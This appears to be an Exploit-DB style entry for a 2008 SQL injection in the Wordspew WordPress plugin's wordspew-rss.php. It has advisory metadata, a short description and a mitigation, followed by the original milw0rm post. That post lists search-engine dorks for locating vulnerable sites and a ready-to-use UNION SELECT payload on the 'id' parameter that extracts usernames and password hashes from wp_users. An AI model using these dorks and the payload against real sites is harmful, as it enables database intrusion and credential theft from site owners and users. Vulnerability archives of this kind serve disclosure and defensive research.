Wordpress Plugin (wordspew-rss.php) SQL Injection

vendor:

Wordspew-rss.php

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wordspew-rss.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WordPress Plugin (wordspew-rss.php) SQL Injection

A SQL injection vulnerability exists in the Wordpress Plugin (wordspew-rss.php) which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to insufficient input validation of the 'id' parameter in the 'wordspew-rss.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, such as user credentials.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################################
#
# Wordpress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: "wordspew-rss.php"

DORK 2 : allinurl: "wp-content/plugins/wordspew"

DORK 3 : allinurl: "wordspew/wordspew-rss.php"

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users


#########################################################################
# S@BUN                      www.hackturkiye.com                          S@BUN
#########################################################################
# S@BUN                          GOOD LUCKY                                  S@BUN
#########################################################################

# milw0rm.com [2008-02-02]